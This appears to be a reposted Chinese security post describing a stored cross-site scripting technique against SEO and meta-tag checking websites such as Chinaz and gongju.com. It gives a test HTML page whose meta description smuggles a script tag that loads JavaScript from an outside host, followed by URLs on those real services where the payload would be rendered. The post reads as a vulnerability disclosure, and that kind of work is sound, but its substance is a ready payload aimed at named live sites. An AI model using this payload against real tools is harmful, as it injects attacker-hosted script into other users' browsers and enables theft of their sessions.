这是一类网站。
详细说明:现在有很多网站信息查询,seo优化,网站安全检测之类的网站,这些网站通常会抓取网页的meta信息。这样如果用户的meta是恶意代码,就会出现问题。
站长 之家等网站就有这样的问题。
测试代码,写一个简单的页面:
<html>
<head><meta name="keywords" content='tmxk.org' />
<meta name="description" content="<script src=http://tmxk.org/x.js style=''" /></head><body></body></html>
然后到站长之家去检测,
seo.chinaz.com/?host=unbet8.com%2f%
截图:
其它举例:
http://www.gongju.com/meta/#url=unbet8.com/0.htm
http://www.gongju.com/meta/ret/01370d996e987723/
http://tool.chinaz.com/Tools/MetaCheck. asp x?url=unbet8.com%2F%
查看更多关于站长之家存储型xss(一种新思路) - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13388